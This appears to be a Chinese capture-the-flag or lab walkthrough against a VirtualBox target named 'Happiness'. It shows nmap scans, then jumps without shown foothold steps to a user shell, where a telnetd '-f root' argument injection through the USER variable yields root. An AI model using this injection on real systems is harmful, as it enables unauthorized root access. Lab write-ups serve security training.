┌──(root㉿kali)-[~/miaosec] └─# nmap -sn 192.168.2.0/24 Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-26 10:17 +0800 Nmap scan report for 192.168.2.1 Host is up (0.0020s latency). MAC Address: 0A:00:27:00:00:07 (Unknown) Nmap scan report for 192.168.2.2 Host is up (0.0015s latency). MAC Address: 08:00:27:AA:CF:40 (Oracle VirtualBox virtual NIC) Nmap scan report for 192.168.2.59 Host is up (0.00054s latency). MAC Address: 08:00:27:C6:D2:2B (Oracle VirtualBox virtual NIC) Nmap scan report for 192.168.2.4 Host is up. Nmap done: 256 IP addresses (4 hosts up) scanned in 9.02 seconds
靶机IP:192.168.2.59
2、端口扫描
1.全端口扫描
1 2 3 4 5 6 7 8 9 10 11 12 13
┌──(root㉿kali)-[~/miaosec] └─# nmap --min-rate 10000 -p- 192.168.2.59 Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-26 10:17 +0800 Nmap scan report for 192.168.2.59 Host is up (0.00045s latency). Not shown: 65532 closed tcp ports (reset) PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 80/tcp open http MAC Address: 08:00:27:C6:D2:2B (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 7.73 seconds
┌──(root㉿kali)-[~/miaosec] └─# nmap --min-rate 10000 -sT -sC -sV -O -p21,22,80 192.168.2.59 Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-26 10:17 +0800 Nmap scan report for 192.168.2.59 Host is up (0.00049s latency).
PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 2.0.8 or later | ftp-syst: | STAT: | FTP server status: | Connected to 192.168.2.4 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeoutin seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 1 | vsFTPd 3.0.3 - secure, fast, stable |_End of status | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_-r--r--r-- 1 0 0 20 Jan 22 12:27 readme.txt 22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0) | ssh-hostkey: | 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA) | 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA) |_ 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519) 80/tcp open http Apache httpd 2.4.62 ((Debian)) |_http-server-header: Apache/2.4.62 (Debian) |_http-title: Site doesn't have a title (text/html). MAC Address: 08:00:27:C6:D2:2B (Oracle VirtualBox virtual NIC) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose|router Running: Linux 4.X|5.X, MikroTik RouterOS 7.X OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3 OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 17.90 seconds
3.udp扫描
1 2 3 4 5 6 7 8 9 10 11
┌──(root㉿kali)-[~/miaosec] └─# nmap -sU --top-ports 100 192.168.2.59 Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-26 10:18 +0800 Nmap scan report for 192.168.2.59 Host is up (0.00065s latency). Not shown: 99 closed udp ports (port-unreach) PORT STATE SERVICE 68/udp open|filtered dhcpc MAC Address: 08:00:27:C6:D2:2B (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 113.26 seconds
Eecho@Happiness:~$ dpkg -S /usr/sbin/telnetd && telnetd --version inetutils-telnetd: /usr/sbin/telnetd telnetd (GNU inetutils) 2.0 Copyright (C) 2021 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later <https://gnu.org/licenses/gpl.html>. This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law.
Written by many authors.
telnetd (GNU inetutils) 2.0符合要求,尝试进行利用
1
USER='-f root' telnet -a 127.0.0.1 23
成功获取到root权限
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19
Eecho@Happiness:~$ USER='-f root' busybox telnet -a 127.0.0.1 23
Entering character mode Escape character is '^]'.
Linux 4.19.0-27-amd64 (localhost) (pts/1)
Last login: Thu Jan 22 23:44:10 EST 2026 from 192.168.1.12 on pts/0 Linux Happiness 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. root@Happiness:~# id uid=0(root) gid=0(root) groups=0(root)